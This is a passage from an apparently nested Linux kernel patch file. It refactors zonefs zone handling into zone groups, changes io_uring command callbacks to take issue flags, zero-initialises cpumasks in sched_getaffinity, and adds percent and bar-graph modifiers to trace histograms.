++					zone->cond = BLK_ZONE_COND_READONLY;
++				else if (next->cond == BLK_ZONE_COND_OFFLINE)
++					zone->cond = BLK_ZONE_COND_OFFLINE;
++			}
++		}
++
++		z = &zgroup->g_zones[n];
++		if (ztype == ZONEFS_ZTYPE_CNV)
++			z->z_flags |= ZONEFS_ZONE_CNV;
++		z->z_sector = zone->start;
++		z->z_size = zone->len << SECTOR_SHIFT;
++		if (z->z_size > bdev_zone_sectors(sb->s_bdev) << SECTOR_SHIFT &&
++		    !(sbi->s_features & ZONEFS_F_AGGRCNV)) {
++			zonefs_err(sb,
++				"Invalid zone size %llu (device zone sectors %llu)\n",
++				z->z_size,
++				bdev_zone_sectors(sb->s_bdev) << SECTOR_SHIFT);
++			return -EINVAL;
++		}
++
++		z->z_capacity = min_t(loff_t, MAX_LFS_FILESIZE,
++				      zone->capacity << SECTOR_SHIFT);
++		z->z_wpoffset = zonefs_check_zone_condition(sb, z, zone);
++
++		sb->s_maxbytes = max(z->z_capacity, sb->s_maxbytes);
++		sbi->s_blocks += z->z_capacity >> sb->s_blocksize_bits;
++		sbi->s_used_blocks += z->z_wpoffset >> sb->s_blocksize_bits;
++
++		/*
++		 * For sequential zones, make sure that any open zone is closed
++		 * first to ensure that the initial number of open zones is 0,
++		 * in sync with the open zone accounting done when the mount
++		 * option ZONEFS_MNTOPT_EXPLICIT_OPEN is used.
++		 */
++		if (ztype == ZONEFS_ZTYPE_SEQ &&
++		    (zone->cond == BLK_ZONE_COND_IMP_OPEN ||
++		     zone->cond == BLK_ZONE_COND_EXP_OPEN)) {
++			ret = zonefs_zone_mgmt(sb, z, REQ_OP_ZONE_CLOSE);
++			if (ret)
++				return ret;
++		}
++
++		zonefs_account_active(sb, z);
++
++		n++;
++	}
++
++	if (WARN_ON_ONCE(n != zgroup->g_nr_zones))
++		return -EINVAL;
++
++	zonefs_info(sb, "Zone group \"%s\" has %u file%s\n",
++		    zonefs_zgroup_name(ztype),
++		    zgroup->g_nr_zones,
++		    zgroup->g_nr_zones > 1 ? "s" : "");
++
++	return 0;
++}
++
++static void zonefs_free_zgroups(struct super_block *sb)
++{
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
++	enum zonefs_ztype ztype;
++
++	if (!sbi)
++		return;
++
++	for (ztype = 0; ztype < ZONEFS_ZTYPE_MAX; ztype++) {
++		kvfree(sbi->s_zgroup[ztype].g_zones);
++		sbi->s_zgroup[ztype].g_zones = NULL;
++	}
++}
++
++/*
++ * Create a zone group and populate it with zone files.
++ */
++static int zonefs_init_zgroups(struct super_block *sb)
++{
++	struct zonefs_zone_data zd;
++	enum zonefs_ztype ztype;
++	int ret;
++
++	/* First get the device zone information */
++	memset(&zd, 0, sizeof(struct zonefs_zone_data));
++	zd.sb = sb;
++	ret = zonefs_get_zone_info(&zd);
++	if (ret)
++		goto cleanup;
++
++	/* Allocate and initialize the zone groups */
++	for (ztype = 0; ztype < ZONEFS_ZTYPE_MAX; ztype++) {
++		ret = zonefs_init_zgroup(sb, &zd, ztype);
++		if (ret) {
++			zonefs_info(sb,
++				    "Zone group \"%s\" initialization failed\n",
++				    zonefs_zgroup_name(ztype));
++			break;
++		}
++	}
++
++cleanup:
++	zonefs_free_zone_info(&zd);
++	if (ret)
++		zonefs_free_zgroups(sb);
++
++	return ret;
++}
++
+ /*
+  * Read super block information from the device.
+  */
+@@ -1785,6 +1040,14 @@ free_page:
+ 	return ret;
+ }
+ 
++static const struct super_operations zonefs_sops = {
++	.alloc_inode	= zonefs_alloc_inode,
++	.free_inode	= zonefs_free_inode,
++	.statfs		= zonefs_statfs,
++	.remount_fs	= zonefs_remount,
++	.show_options	= zonefs_show_options,
++};
++
+ /*
+  * Check that the device is zoned. If it is, get the list of zones and create
+  * sub-directories and files according to the device zone configuration and
+@@ -1792,7 +1055,6 @@ free_page:
+  */
+ static int zonefs_fill_super(struct super_block *sb, void *data, int silent)
+ {
+-	struct zonefs_zone_data zd;
+ 	struct zonefs_sb_info *sbi;
+ 	struct inode *inode;
+ 	enum zonefs_ztype t;
+@@ -1845,16 +1107,6 @@ static int zonefs_fill_super(struct super_block *sb, void *data, int silent)
+ 	if (ret)
+ 		return ret;
+ 
+-	memset(&zd, 0, sizeof(struct zonefs_zone_data));
+-	zd.sb = sb;
+-	ret = zonefs_get_zone_info(&zd);
+-	if (ret)
+-		goto cleanup;
+-
+-	ret = zonefs_sysfs_register(sb);
+-	if (ret)
+-		goto cleanup;
+-
+ 	zonefs_info(sb, "Mounting %u zones", bdev_nr_zones(sb->s_bdev));
+ 
+ 	if (!sbi->s_max_wro_seq_files &&
+@@ -1865,6 +1117,11 @@ static int zonefs_fill_super(struct super_block *sb, void *data, int silent)
+ 		sbi->s_mount_opts &= ~ZONEFS_MNTOPT_EXPLICIT_OPEN;
+ 	}
+ 
++	/* Initialize the zone groups */
++	ret = zonefs_init_zgroups(sb);
++	if (ret)
++		goto cleanup;
++
+ 	/* Create root directory inode */
+ 	ret = -ENOMEM;
+ 	inode = new_inode(sb);
+@@ -1884,13 +1141,19 @@ static int zonefs_fill_super(struct super_block *sb, void *data, int silent)
+ 
+ 	/* Create and populate files in zone groups directories */
+ 	for (t = 0; t < ZONEFS_ZTYPE_MAX; t++) {
+-		ret = zonefs_create_zgroup(&zd, t);
++		ret = zonefs_create_zgroup_inodes(sb, t);
+ 		if (ret)
+-			break;
++			goto cleanup;
+ 	}
+ 
++	ret = zonefs_sysfs_register(sb);
++	if (ret)
++		goto cleanup;
++
++	return 0;
++
+ cleanup:
+-	zonefs_cleanup_zone_info(&zd);
++	zonefs_free_zgroups(sb);
+ 
+ 	return ret;
+ }
+@@ -1909,6 +1172,7 @@ static void zonefs_kill_super(struct super_block *sb)
+ 		d_genocide(sb->s_root);
+ 
+ 	zonefs_sysfs_unregister(sb);
++	zonefs_free_zgroups(sb);
+ 	kill_block_super(sb);
+ 	kfree(sbi);
+ }
+diff --git a/fs/zonefs/trace.h b/fs/zonefs/trace.h
+index 42edcfd393ed2..9969db3a9c7dc 100644
+--- a/fs/zonefs/trace.h
++++ b/fs/zonefs/trace.h
+@@ -20,8 +20,9 @@
+ #define show_dev(dev) MAJOR(dev), MINOR(dev)
+ 
+ TRACE_EVENT(zonefs_zone_mgmt,
+-	    TP_PROTO(struct inode *inode, enum req_op op),
+-	    TP_ARGS(inode, op),
++	    TP_PROTO(struct super_block *sb, struct zonefs_zone *z,
++		     enum req_op op),
++	    TP_ARGS(sb, z, op),
+ 	    TP_STRUCT__entry(
+ 			     __field(dev_t, dev)
+ 			     __field(ino_t, ino)
+@@ -30,12 +31,12 @@ TRACE_EVENT(zonefs_zone_mgmt,
+ 			     __field(sector_t, nr_sectors)
+ 	    ),
+ 	    TP_fast_assign(
+-			   __entry->dev = inode->i_sb->s_dev;
+-			   __entry->ino = inode->i_ino;
++			   __entry->dev = sb->s_dev;
++			   __entry->ino =
++				z->z_sector >> ZONEFS_SB(sb)->s_zone_sectors_shift;
+ 			   __entry->op = op;
+-			   __entry->sector = ZONEFS_I(inode)->i_zsector;
+-			   __entry->nr_sectors =
+-				   ZONEFS_I(inode)->i_zone_size >> SECTOR_SHIFT;
++			   __entry->sector = z->z_sector;
++			   __entry->nr_sectors = z->z_size >> SECTOR_SHIFT;
+ 	    ),
+ 	    TP_printk("bdev=(%d,%d), ino=%lu op=%s, sector=%llu, nr_sectors=%llu",
+ 		      show_dev(__entry->dev), (unsigned long)__entry->ino,
+@@ -58,9 +59,10 @@ TRACE_EVENT(zonefs_file_dio_append,
+ 	    TP_fast_assign(
+ 			   __entry->dev = inode->i_sb->s_dev;
+ 			   __entry->ino = inode->i_ino;
+-			   __entry->sector = ZONEFS_I(inode)->i_zsector;
++			   __entry->sector = zonefs_inode_zone(inode)->z_sector;
+ 			   __entry->size = size;
+-			   __entry->wpoffset = ZONEFS_I(inode)->i_wpoffset;
++			   __entry->wpoffset =
++				zonefs_inode_zone(inode)->z_wpoffset;
+ 			   __entry->ret = ret;
+ 	    ),
+ 	    TP_printk("bdev=(%d, %d), ino=%lu, sector=%llu, size=%zu, wpoffset=%llu, ret=%zu",
+diff --git a/fs/zonefs/zonefs.h b/fs/zonefs/zonefs.h
+index 1dbe78119ff16..2d626e18b1411 100644
+--- a/fs/zonefs/zonefs.h
++++ b/fs/zonefs/zonefs.h
+@@ -39,31 +39,47 @@ static inline enum zonefs_ztype zonefs_zone_type(struct blk_zone *zone)
+ 	return ZONEFS_ZTYPE_SEQ;
+ }
+ 
+-#define ZONEFS_ZONE_OPEN	(1U << 0)
+-#define ZONEFS_ZONE_ACTIVE	(1U << 1)
+-#define ZONEFS_ZONE_OFFLINE	(1U << 2)
+-#define ZONEFS_ZONE_READONLY	(1U << 3)
++#define ZONEFS_ZONE_INIT_MODE	(1U << 0)
++#define ZONEFS_ZONE_OPEN	(1U << 1)
++#define ZONEFS_ZONE_ACTIVE	(1U << 2)
++#define ZONEFS_ZONE_OFFLINE	(1U << 3)
++#define ZONEFS_ZONE_READONLY	(1U << 4)
++#define ZONEFS_ZONE_CNV		(1U << 31)
+ 
+ /*
+- * In-memory inode data.
++ * In-memory per-file inode zone data.
+  */
+-struct zonefs_inode_info {
+-	struct inode		i_vnode;
++struct zonefs_zone {
++	/* Zone state flags */
++	unsigned int		z_flags;
+ 
+-	/* File zone type */
+-	enum zonefs_ztype	i_ztype;
++	/* Zone start sector (512B unit) */
++	sector_t		z_sector;
+ 
+-	/* File zone start sector (512B unit) */
+-	sector_t		i_zsector;
++	/* Zone size (bytes) */
++	loff_t			z_size;
+ 
+-	/* File zone write pointer position (sequential zones only) */
+-	loff_t			i_wpoffset;
++	/* Zone capacity (file maximum size, bytes) */
++	loff_t			z_capacity;
+ 
+-	/* File maximum size */
+-	loff_t			i_max_size;
++	/* Write pointer offset in the zone (sequential zones only, bytes) */
++	loff_t			z_wpoffset;
++};
+ 
+-	/* File zone size */
+-	loff_t			i_zone_size;
++/*
++ * In memory zone group information: all zones of a group are exposed
++ * as files, one file per zone.
++ */
++struct zonefs_zone_group {
++	unsigned int		g_nr_zones;
++	struct zonefs_zone	*g_zones;
++};
++
++/*
++ * In-memory inode data.
++ */
++struct zonefs_inode_info {
++	struct inode		i_vnode;
+ 
+ 	/*
+ 	 * To serialise fully against both syscall and mmap based IO and
+@@ -82,7 +98,6 @@ struct zonefs_inode_info {
+ 
+ 	/* guarded by i_truncate_mutex */
+ 	unsigned int		i_wr_refcnt;
+-	unsigned int		i_flags;
+ };
+ 
+ static inline struct zonefs_inode_info *ZONEFS_I(struct inode *inode)
+@@ -90,6 +105,31 @@ static inline struct zonefs_inode_info *ZONEFS_I(struct inode *inode)
+ 	return container_of(inode, struct zonefs_inode_info, i_vnode);
+ }
+ 
++static inline bool zonefs_zone_is_cnv(struct zonefs_zone *z)
++{
++	return z->z_flags & ZONEFS_ZONE_CNV;
++}
++
++static inline bool zonefs_zone_is_seq(struct zonefs_zone *z)
++{
++	return !zonefs_zone_is_cnv(z);
++}
++
++static inline struct zonefs_zone *zonefs_inode_zone(struct inode *inode)
++{
++	return inode->i_private;
++}
++
++static inline bool zonefs_inode_is_cnv(struct inode *inode)
++{
++	return zonefs_zone_is_cnv(zonefs_inode_zone(inode));
++}
++
++static inline bool zonefs_inode_is_seq(struct inode *inode)
++{
++	return zonefs_zone_is_seq(zonefs_inode_zone(inode));
++}
++
+ /*
+  * On-disk super block (block 0).
+  */
+@@ -181,7 +221,7 @@ struct zonefs_sb_info {
+ 	uuid_t			s_uuid;
+ 	unsigned int		s_zone_sectors_shift;
+ 
+-	unsigned int		s_nr_files[ZONEFS_ZTYPE_MAX];
++	struct zonefs_zone_group s_zgroup[ZONEFS_ZTYPE_MAX];
+ 
+ 	loff_t			s_blocks;
+ 	loff_t			s_used_blocks;
+@@ -209,6 +249,28 @@ static inline struct zonefs_sb_info *ZONEFS_SB(struct super_block *sb)
+ #define zonefs_warn(sb, format, args...)	\
+ 	pr_warn("zonefs (%s) WARNING: " format, sb->s_id, ## args)
+ 
++/* In super.c */
++void zonefs_inode_account_active(struct inode *inode);
++int zonefs_inode_zone_mgmt(struct inode *inode, enum req_op op);
++void zonefs_i_size_write(struct inode *inode, loff_t isize);
++void zonefs_update_stats(struct inode *inode, loff_t new_isize);
++void __zonefs_io_error(struct inode *inode, bool write);
++
++static inline void zonefs_io_error(struct inode *inode, bool write)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++
++	mutex_lock(&zi->i_truncate_mutex);
++	__zonefs_io_error(inode, write);
++	mutex_unlock(&zi->i_truncate_mutex);
++}
++
++/* In file.c */
++extern const struct address_space_operations zonefs_file_aops;
++extern const struct file_operations zonefs_file_operations;
++int zonefs_file_truncate(struct inode *inode, loff_t isize);
++
++/* In sysfs.c */
+ int zonefs_sysfs_register(struct super_block *sb);
+ void zonefs_sysfs_unregister(struct super_block *sb);
+ int zonefs_sysfs_init(void);
+diff --git a/include/linux/io_uring.h b/include/linux/io_uring.h
+index 0ded9e271523f..a1484cdb3158e 100644
+--- a/include/linux/io_uring.h
++++ b/include/linux/io_uring.h
+@@ -26,7 +26,7 @@ struct io_uring_cmd {
+ 	const void	*cmd;
+ 	union {
+ 		/* callback to defer completions to task context */
+-		void (*task_work_cb)(struct io_uring_cmd *cmd);
++		void (*task_work_cb)(struct io_uring_cmd *cmd, unsigned);
+ 		/* used for polled completion */
+ 		void *cookie;
+ 	};
+@@ -38,9 +38,10 @@ struct io_uring_cmd {
+ #if defined(CONFIG_IO_URING)
+ int io_uring_cmd_import_fixed(u64 ubuf, unsigned long len, int rw,
+ 			      struct iov_iter *iter, void *ioucmd);
+-void io_uring_cmd_done(struct io_uring_cmd *cmd, ssize_t ret, ssize_t res2);
++void io_uring_cmd_done(struct io_uring_cmd *cmd, ssize_t ret, ssize_t res2,
++			unsigned issue_flags);
+ void io_uring_cmd_complete_in_task(struct io_uring_cmd *ioucmd,
+-			void (*task_work_cb)(struct io_uring_cmd *));
++			void (*task_work_cb)(struct io_uring_cmd *, unsigned));
+ struct sock *io_uring_get_socket(struct file *file);
+ void __io_uring_cancel(bool cancel_all);
+ void __io_uring_free(struct task_struct *tsk);
+@@ -71,11 +72,11 @@ static inline int io_uring_cmd_import_fixed(u64 ubuf, unsigned long len, int rw,
+ 	return -EOPNOTSUPP;
+ }
+ static inline void io_uring_cmd_done(struct io_uring_cmd *cmd, ssize_t ret,
+-		ssize_t ret2)
++		ssize_t ret2, unsigned issue_flags)
+ {
+ }
+ static inline void io_uring_cmd_complete_in_task(struct io_uring_cmd *ioucmd,
+-			void (*task_work_cb)(struct io_uring_cmd *))
++			void (*task_work_cb)(struct io_uring_cmd *, unsigned))
+ {
+ }
+ static inline struct sock *io_uring_get_socket(struct file *file)
+diff --git a/include/trace/events/rcu.h b/include/trace/events/rcu.h
+index 90b2fb0292cb1..012fa0d171b27 100644
+--- a/include/trace/events/rcu.h
++++ b/include/trace/events/rcu.h
+@@ -768,7 +768,7 @@ TRACE_EVENT_RCU(rcu_torture_read,
+ 	TP_ARGS(rcutorturename, rhp, secs, c_old, c),
+ 
+ 	TP_STRUCT__entry(
+-		__field(char, rcutorturename[RCUTORTURENAME_LEN])
++		__array(char, rcutorturename, RCUTORTURENAME_LEN)
+ 		__field(struct rcu_head *, rhp)
+ 		__field(unsigned long, secs)
+ 		__field(unsigned long, c_old)
+diff --git a/include/xen/interface/platform.h b/include/xen/interface/platform.h
+index 655d92e803e14..79a443c65ea93 100644
+--- a/include/xen/interface/platform.h
++++ b/include/xen/interface/platform.h
+@@ -483,6 +483,8 @@ struct xenpf_symdata {
+ };
+ DEFINE_GUEST_HANDLE_STRUCT(xenpf_symdata);
+ 
++#define XENPF_get_dom0_console 64
++
+ struct xen_platform_op {
+ 	uint32_t cmd;
+ 	uint32_t interface_version; /* XENPF_INTERFACE_VERSION */
+@@ -506,6 +508,7 @@ struct xen_platform_op {
+ 		struct xenpf_mem_hotadd        mem_add;
+ 		struct xenpf_core_parking      core_parking;
+ 		struct xenpf_symdata           symdata;
++		struct dom0_vga_console_info   dom0_console;
+ 		uint8_t                        pad[128];
+ 	} u;
+ };
+diff --git a/io_uring/alloc_cache.h b/io_uring/alloc_cache.h
+index 729793ae97127..c2cde88aeed53 100644
+--- a/io_uring/alloc_cache.h
++++ b/io_uring/alloc_cache.h
+@@ -27,6 +27,7 @@ static inline struct io_cache_entry *io_alloc_cache_get(struct io_alloc_cache *c
+ 		struct hlist_node *node = cache->list.first;
+ 
+ 		hlist_del(node);
++		cache->nr_cached--;
+ 		return container_of(node, struct io_cache_entry, node);
+ 	}
+ 
+diff --git a/io_uring/poll.c b/io_uring/poll.c
+index 56dbd1863c785..4788073ec45d2 100644
+--- a/io_uring/poll.c
++++ b/io_uring/poll.c
+@@ -742,6 +742,7 @@ int io_arm_poll_handler(struct io_kiocb *req, unsigned issue_flags)
+ 	apoll = io_req_alloc_apoll(req, issue_flags);
+ 	if (!apoll)
+ 		return IO_APOLL_ABORTED;
++	req->flags &= ~(REQ_F_SINGLE_POLL | REQ_F_DOUBLE_POLL);
+ 	req->flags |= REQ_F_POLLED;
+ 	ipt.pt._qproc = io_async_queue_proc;
+ 
+diff --git a/io_uring/rsrc.h b/io_uring/rsrc.h
+index 81445a477622b..d60c758326b42 100644
+--- a/io_uring/rsrc.h
++++ b/io_uring/rsrc.h
+@@ -143,15 +143,13 @@ static inline void io_req_set_rsrc_node(struct io_kiocb *req,
+ 					unsigned int issue_flags)
+ {
+ 	if (!req->rsrc_node) {
+-		req->rsrc_node = ctx->rsrc_node;
++		io_ring_submit_lock(ctx, issue_flags);
+ 
+-		if (!(issue_flags & IO_URING_F_UNLOCKED)) {
+-			lockdep_assert_held(&ctx->uring_lock);
++		lockdep_assert_held(&ctx->uring_lock);
+ 
+-			io_charge_rsrc_node(ctx);
+-		} else {
+-			percpu_ref_get(&req->rsrc_node->refs);
+-		}
++		req->rsrc_node = ctx->rsrc_node;
++		io_charge_rsrc_node(ctx);
++		io_ring_submit_unlock(ctx, issue_flags);
+ 	}
+ }
+ 
+diff --git a/io_uring/uring_cmd.c b/io_uring/uring_cmd.c
+index 18dfc5f6a8b72..92f310dfb9fd6 100644
+--- a/io_uring/uring_cmd.c
++++ b/io_uring/uring_cmd.c
+@@ -15,12 +15,13 @@
+ static void io_uring_cmd_work(struct io_kiocb *req, bool *locked)
+ {
+ 	struct io_uring_cmd *ioucmd = io_kiocb_to_cmd(req, struct io_uring_cmd);
++	unsigned issue_flags = *locked ? 0 : IO_URING_F_UNLOCKED;
+ 
+-	ioucmd->task_work_cb(ioucmd);
++	ioucmd->task_work_cb(ioucmd, issue_flags);
+ }
+ 
+ void io_uring_cmd_complete_in_task(struct io_uring_cmd *ioucmd,
+-			void (*task_work_cb)(struct io_uring_cmd *))
++			void (*task_work_cb)(struct io_uring_cmd *, unsigned))
+ {
+ 	struct io_kiocb *req = cmd_to_io_kiocb(ioucmd);
+ 
+@@ -42,7 +43,8 @@ static inline void io_req_set_cqe32_extra(struct io_kiocb *req,
+  * Called by consumers of io_uring_cmd, if they originally returned
+  * -EIOCBQUEUED upon receiving the command.
+  */
+-void io_uring_cmd_done(struct io_uring_cmd *ioucmd, ssize_t ret, ssize_t res2)
++void io_uring_cmd_done(struct io_uring_cmd *ioucmd, ssize_t ret, ssize_t res2,
++		       unsigned issue_flags)
+ {
+ 	struct io_kiocb *req = cmd_to_io_kiocb(ioucmd);
+ 
+@@ -56,7 +58,7 @@ void io_uring_cmd_done(struct io_uring_cmd *ioucmd, ssize_t ret, ssize_t res2)
+ 		/* order with io_iopoll_req_issued() checking ->iopoll_complete */
+ 		smp_store_release(&req->iopoll_completed, 1);
+ 	else
+-		__io_req_complete(req, 0);
++		__io_req_complete(req, issue_flags);
+ }
+ EXPORT_SYMBOL_GPL(io_uring_cmd_done);
+ 
+diff --git a/kernel/compat.c b/kernel/compat.c
+index 55551989d9da5..fb50f29d9b361 100644
+--- a/kernel/compat.c
++++ b/kernel/compat.c
+@@ -152,7 +152,7 @@ COMPAT_SYSCALL_DEFINE3(sched_getaffinity, compat_pid_t,  pid, unsigned int, len,
+ 	if (len & (sizeof(compat_ulong_t)-1))
+ 		return -EINVAL;
+ 
+-	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
++	if (!zalloc_cpumask_var(&mask, GFP_KERNEL))
+ 		return -ENOMEM;
+ 
+ 	ret = sched_getaffinity(pid, mask);
+diff --git a/kernel/kcsan/Makefile b/kernel/kcsan/Makefile
+index 4f35d1bced6a2..a45f3dfc8d141 100644
+--- a/kernel/kcsan/Makefile
++++ b/kernel/kcsan/Makefile
+@@ -16,5 +16,6 @@ obj-y := core.o debugfs.o report.o
+ KCSAN_INSTRUMENT_BARRIERS_selftest.o := y
+ obj-$(CONFIG_KCSAN_SELFTEST) += selftest.o
+ 
+-CFLAGS_kcsan_test.o := $(CFLAGS_KCSAN) -g -fno-omit-frame-pointer
++CFLAGS_kcsan_test.o := $(CFLAGS_KCSAN) -fno-omit-frame-pointer
++CFLAGS_kcsan_test.o += $(DISABLE_STRUCTLEAK_PLUGIN)
+ obj-$(CONFIG_KCSAN_KUNIT_TEST) += kcsan_test.o
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index 9ebfd484189b3..b23dcbeacdf33 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -8304,14 +8304,14 @@ SYSCALL_DEFINE3(sched_getaffinity, pid_t, pid, unsigned int, len,
+ 	if (len & (sizeof(unsigned long)-1))
+ 		return -EINVAL;
+ 
+-	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
++	if (!zalloc_cpumask_var(&mask, GFP_KERNEL))
+ 		return -ENOMEM;
+ 
+ 	ret = sched_getaffinity(pid, mask);
+ 	if (ret == 0) {
+ 		unsigned int retlen = min(len, cpumask_size());
+ 
+-		if (copy_to_user(user_mask_ptr, mask, retlen))
++		if (copy_to_user(user_mask_ptr, cpumask_bits(mask), retlen))
+ 			ret = -EFAULT;
+ 		else
+ 			ret = retlen;
+diff --git a/kernel/trace/kprobe_event_gen_test.c b/kernel/trace/kprobe_event_gen_test.c
+index c736487fc0e48..e0c420eb0b2b4 100644
+--- a/kernel/trace/kprobe_event_gen_test.c
++++ b/kernel/trace/kprobe_event_gen_test.c
+@@ -146,7 +146,7 @@ static int __init test_gen_kprobe_cmd(void)
+ 	if (trace_event_file_is_valid(gen_kprobe_test))
+ 		gen_kprobe_test = NULL;
+ 	/* We got an error after creating the event, delete it */
+-	ret = kprobe_event_delete("gen_kprobe_test");
++	kprobe_event_delete("gen_kprobe_test");
+ 	goto out;
+ }
+ 
+@@ -211,7 +211,7 @@ static int __init test_gen_kretprobe_cmd(void)
+ 	if (trace_event_file_is_valid(gen_kretprobe_test))
+ 		gen_kretprobe_test = NULL;
+ 	/* We got an error after creating the event, delete it */
+-	ret = kprobe_event_delete("gen_kretprobe_test");
++	kprobe_event_delete("gen_kretprobe_test");
+ 	goto out;
+ }
+ 
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 888980257340f..78d69b9488e45 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -5727,7 +5727,9 @@ static const char readme_msg[] =
+ 	"\t            .syscall    display a syscall id as a syscall name\n"
+ 	"\t            .log2       display log2 value rather than raw number\n"
+ 	"\t            .buckets=size  display values in groups of size rather than raw number\n"
+-	"\t            .usecs      display a common_timestamp in microseconds\n\n"
++	"\t            .usecs      display a common_timestamp in microseconds\n"
++	"\t            .percent    display a number of percentage value\n"
++	"\t            .graph      display a bar-graph of a value\n\n"
+ 	"\t    The 'pause' parameter can be used to pause an existing hist\n"
+ 	"\t    trigger or to start a hist trigger but not log any events\n"
+ 	"\t    until told to do so.  'continue' can be used to start or\n"
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index e3df03cdecbcb..2b2120ed2460f 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -506,6 +506,8 @@ enum hist_field_flags {
+ 	HIST_FIELD_FL_ALIAS		= 1 << 16,
+ 	HIST_FIELD_FL_BUCKET		= 1 << 17,
+ 	HIST_FIELD_FL_CONST		= 1 << 18,
++	HIST_FIELD_FL_PERCENT		= 1 << 19,
++	HIST_FIELD_FL_GRAPH		= 1 << 20,
+ };
+ 
+ struct var_defs {
+@@ -1708,6 +1710,10 @@ static const char *get_hist_field_flags(struct hist_field *hist_field)
+ 		flags_str = "buckets";
+ 	else if (hist_field->flags & HIST_FIELD_FL_TIMESTAMP_USECS)
+ 		flags_str = "usecs";
++	else if (hist_field->flags & HIST_FIELD_FL_PERCENT)
++		flags_str = "percent";
++	else if (hist_field->flags & HIST_FIELD_FL_GRAPH)
++		flags_str = "graph";
+ 
+ 	return flags_str;
+ }
+@@ -2320,6 +2326,14 @@ parse_field(struct hist_trigger_data *hist_data, struct trace_event_file *file,
+ 			if (ret || !(*buckets))
+ 				goto error;
+ 			*flags |= HIST_FIELD_FL_BUCKET;
++		} else if (strncmp(modifier, "percent", 7) == 0) {
++			if (*flags & (HIST_FIELD_FL_VAR | HIST_FIELD_FL_KEY))
++				goto error;
++			*flags |= HIST_FIELD_FL_PERCENT;
++		} else if (strncmp(modifier, "graph", 5) == 0) {
++			if (*flags & (HIST_FIELD_FL_VAR | HIST_FIELD_FL_KEY))
++				goto error;
++			*flags |= HIST_FIELD_FL_GRAPH;
+ 		} else {
+  error:
+ 			hist_err(tr, HIST_ERR_BAD_FIELD_MODIFIER, errpos(modifier));
+@@ -4179,6 +4193,15 @@ static int __create_val_field(struct hist_trigger_data *hist_data,
+ 		goto out;
+ 	}
+ 
++	/* Some types cannot be a value */
++	if (hist_field->flags & (HIST_FIELD_FL_GRAPH | HIST_FIELD_FL_PERCENT |
++				 HIST_FIELD_FL_BUCKET | HIST_FIELD_FL_LOG2 |
++				 HIST_FIELD_FL_SYM | HIST_FIELD_FL_SYM_OFFSET |
++				 HIST_FIELD_FL_SYSCALL | HIST_FIELD_FL_STACKTRACE)) {
++		hist_err(file->tr, HIST_ERR_BAD_FIELD_MODIFIER, errpos(field_str));
++		ret = -EINVAL;
++	}
++
+ 	hist_data->fields[val_idx] = hist_field;
+ 
+ 	++hist_data->n_vals;
+@@ -5297,33 +5320,101 @@ static void hist_trigger_print_key(struct seq_file *m,
+ 	seq_puts(m, "}");
+ }
+ 
++/* Get the 100 times of the percentage of @val in @total */
++static inline unsigned int __get_percentage(u64 val, u64 total)
++{
++	if (!total)
++		goto div0;
++
++	if (val < (U64_MAX / 10000))
++		return (unsigned int)div64_ul(val * 10000, total);
++
++	total = div64_u64(total, 10000);
++	if (!total)
++		goto div0;
++
++	return (unsigned int)div64_ul(val, total);
++div0:
++	return val ? UINT_MAX : 0;
++}
++
++#define BAR_CHAR '#'
++
++static inline const char *__fill_bar_str(char *buf, int size, u64 val, u64 max)
++{
++	unsigned int len = __get_percentage(val, max);
++	int i;
++
++	if (len == UINT_MAX) {
++		snprintf(buf, size, "[ERROR]");
++		return buf;
++	}
++
++	len = len * size / 10000;
++	for (i = 0; i < len && i < size; i++)
++		buf[i] = BAR_CHAR;
++	while (i < size)
++		buf[i++] = ' ';
++	buf[size] = '\0';
++
++	return buf;
++}
++
++struct hist_val_stat {
++	u64 max;
++	u64 total;
++};
++
++static void hist_trigger_print_val(struct seq_file *m, unsigned int idx,
++				   const char *field_name, unsigned long flags,
++				   struct hist_val_stat *stats,
++				   struct tracing_map_elt *elt)
++{
++	u64 val = tracing_map_read_sum(elt, idx);
++	unsigned int pc;
++	char bar[21];
++
++	if (flags & HIST_FIELD_FL_PERCENT) {
++		pc = __get_percentage(val, stats[idx].total);
++		if (pc == UINT_MAX)
++			seq_printf(m, " %s (%%):[ERROR]", field_name);
++		else
++			seq_printf(m, " %s (%%): %3u.%02u", field_name,
++					pc / 100, pc % 100);
++	} else if (flags & HIST_FIELD_FL_GRAPH) {
++		seq_printf(m, " %s: %20s", field_name,
++			   __fill_bar_str(bar, 20, val, stats[idx].max));
++	} else if (flags & HIST_FIELD_FL_HEX) {
++		seq_printf(m, " %s: %10llx", field_name, val);
++	} else {
++		seq_printf(m, " %s: %10llu", field_name, val);
++	}
++}
++
+ static void hist_trigger_entry_print(struct seq_file *m,
+ 				     struct hist_trigger_data *hist_data,
++				     struct hist_val_stat *stats,
+ 				     void *key,
+ 				     struct tracing_map_elt *elt)
+ {
+ 	const char *field_name;
+-	unsigned int i;
++	unsigned int i = HITCOUNT_IDX;
++	unsigned long flags;
+ 
+ 	hist_trigger_print_key(m, hist_data, key, elt);
+ 
+-	seq_printf(m, " hitcount: %10llu",
+-		   tracing_map_read_sum(elt, HITCOUNT_IDX));
++	/* At first, show the raw hitcount always */
++	hist_trigger_print_val(m, i, "hitcount", 0, stats, elt);
+ 
+ 	for (i = 1; i < hist_data->n_vals; i++) {
+ 		field_name = hist_field_name(hist_data->fields[i], 0);
++		flags = hist_data->fields[i]->flags;
+ 
+-		if (hist_data->fields[i]->flags & HIST_FIELD_FL_VAR ||
+-		    hist_data->fields[i]->flags & HIST_FIELD_FL_EXPR)
++		if (flags & HIST_FIELD_FL_VAR || flags & HIST_FIELD_FL_EXPR)
+ 			continue;
+ 
+-		if (hist_data->fields[i]->flags & HIST_FIELD_FL_HEX) {
+-			seq_printf(m, "  %s: %10llx", field_name,
+-				   tracing_map_read_sum(elt, i));
+-		} else {
+-			seq_printf(m, "  %s: %10llu", field_name,
+-				   tracing_map_read_sum(elt, i));
+-		}
++		seq_puts(m, " ");
++		hist_trigger_print_val(m, i, field_name, flags, stats, elt);
+ 	}
+ 
